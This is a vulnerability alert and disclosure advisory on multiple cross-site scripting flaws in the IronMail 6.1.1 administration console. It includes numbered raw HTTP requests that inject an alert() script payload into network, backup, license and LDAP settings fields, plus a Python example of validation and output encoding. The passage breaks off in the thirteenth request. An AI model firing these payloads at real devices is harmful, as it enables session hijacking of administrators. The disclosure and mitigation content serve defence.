SecurityTracker.com
Category:   Device (Embedded Server/Appliance)  >   McAfee Email Gateway
Vendors:   CipherTrust, Secure Computing
Secure Computing IronMail Multiple Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1017821
SecurityTracker URL:  http://securitytracker.com/id/1017821
CVE Reference:   CVE-2007-1723
Date:  Mar 28 2007
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.1.1
Description:   A vulnerability was reported in Secure Computing IronMail. A remote user can conduct cross-site scripting attacks.

Several scripts on the administration console do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted HTTP request that, when loaded or submitted by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the IronMail device and will run in the security context of that device. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.

Multiple scripts and parameters are affected.

The vendor was notified on February 27, 2007.

Javier Olascoaga reported this vulnerability.

The original advisory is available at:

http://www.514.es/2007/03/siaadv07004_multiples_vulnerab.html

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the IronMail device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ciphertrust.com/products/ironmail/
Cause:   Input validation error
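
The failure described above and its two standard mitigations, as an added example (not IronMail code and not code from the advisory). Field names come from the requests in the advisory below; the single-quoted attribute template, the validator set and the MTU range are assumptions made for illustration.

```python
import html
import ipaddress
import re
from urllib.parse import parse_qsl

# Constructed form body modelled on the advisory's network-settings requests:
# ordinary values plus one field carrying the advisory's alert('SIA') test string.
SAMPLE_BODY = (
    "mtu=1500&hostName=mmail11&domainName=example.net"
    "&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
    "&ipNetMask=255.255.255.224&dns1=10.1.1.3&submit=Submit"
)

# One DNS label: letters, digits and inner hyphens, at most 63 characters.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def is_ipv4(value):
    """Strict dotted-quad IPv4 address."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def is_netmask(value):
    """IPv4 netmask whose one-bits are contiguous from the top."""
    if not is_ipv4(value):
        return False
    inverted = ~int(ipaddress.IPv4Address(value)) & 0xFFFFFFFF
    return inverted & (inverted + 1) == 0


def is_hostname(value):
    return _LABEL.fullmatch(value) is not None


def is_domain(value):
    return len(value) <= 253 and all(_LABEL.fullmatch(p) for p in value.split("."))


def is_mtu(value):
    # Assumed acceptable range; the advisory does not state the product's limits.
    return value.isascii() and value.isdigit() and len(value) <= 5 \
        and 68 <= int(value) <= 9000


# Allowlist validators per field (hypothetical mapping for this example).
VALIDATORS = {
    "ipAddress": is_ipv4, "defaultRouter": is_ipv4,
    "dns1": is_ipv4, "dns2": is_ipv4, "dns3": is_ipv4,
    "ipNetMask": is_netmask, "hostName": is_hostname,
    "domainName": is_domain, "mtu": is_mtu,
}


def rejected_fields(body):
    """Names of submitted fields that fail their allowlist validator."""
    return [name for name, value in parse_qsl(body, keep_blank_values=True)
            if name in VALIDATORS and not VALIDATORS[name](value)]


def render_unsafe(name, value):
    """Echo the value into a single-quoted attribute with no encoding (the flaw)."""
    return "<input type='text' name='%s' value='%s'>" % (name, value)


def render_escaped(name, value):
    """Same field with HTML output encoding, quotes included."""
    return "<input type='text' name='%s' value='%s'>" % (
        html.escape(name, quote=True), html.escape(value, quote=True))


if __name__ == "__main__":
    fields = dict(parse_qsl(SAMPLE_BODY))
    print("rejected by validation:", rejected_fields(SAMPLE_BODY))
    print("unencoded echo:", render_unsafe("ipAddress", fields["ipAddress"]))
    print("encoded echo:  ", render_escaped("ipAddress", fields["ipAddress"]))
```

Validation rejects the malformed address before it is stored, and output encoding keeps any value that does reach the page inside the attribute; the two are complementary, since free-text fields cannot be allowlisted this tightly.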

Message History:   None.


 Source Message Contents

Subject:  Multiple XSS in IronMail

Found multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es.

Regards,

- J

Attachment: SIAADV-07-004-EN.txt

          ===============================
                   - Advisory -
          ===============================

   Title:   Multiple XSS in CipherTrust IronMail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga <jolascoaga *at* 514.es>
     WEB:   http://www.514.es/


.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses,
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations,
corporate policy violations, or theft ("leakage") of confidential information
or intellectual property. IronMail protects enterprise email systems from
threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical tests against the IronMail mail system, several Cross Site
Scripting vulnerabilities were detected in the administration console of the
product.


The XSS issues found are listed below:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11; /admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=; JSESSIONID=B227892A258E91419C09469E49AED4D4

  'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit


.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8


.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=15; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
